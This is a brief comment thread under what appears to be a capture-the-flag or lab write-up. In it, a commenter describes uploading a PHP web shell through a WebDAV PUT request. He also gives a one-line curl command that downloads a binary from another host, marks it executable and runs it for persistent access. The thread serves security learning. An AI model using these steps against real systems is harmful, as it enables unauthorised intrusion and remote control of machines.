Blog Post
Al13nz
Bronze II
2 days agoEnjoyed the write up thanks! cURL is handy for target 3 too if you fancy an alternative method to metasploit
steven
Silver I
12 hours agoyeah curl is a way too, didn't thought about this.
I've done it manually and used burp:
PUT /webdav/shell.php HTTP/1.1
Host: 10.102.63.213
....
Connection: close
Content-Length: 9463
<?php
... /insert your favorite webshell ....
?>
and once the shell was working, use metasploit for perm access and further exploitation:
curl http://10.102.20.4:8000/shell.bin -o shell.bin; chmod 755 shell.bin ; ./shell.bin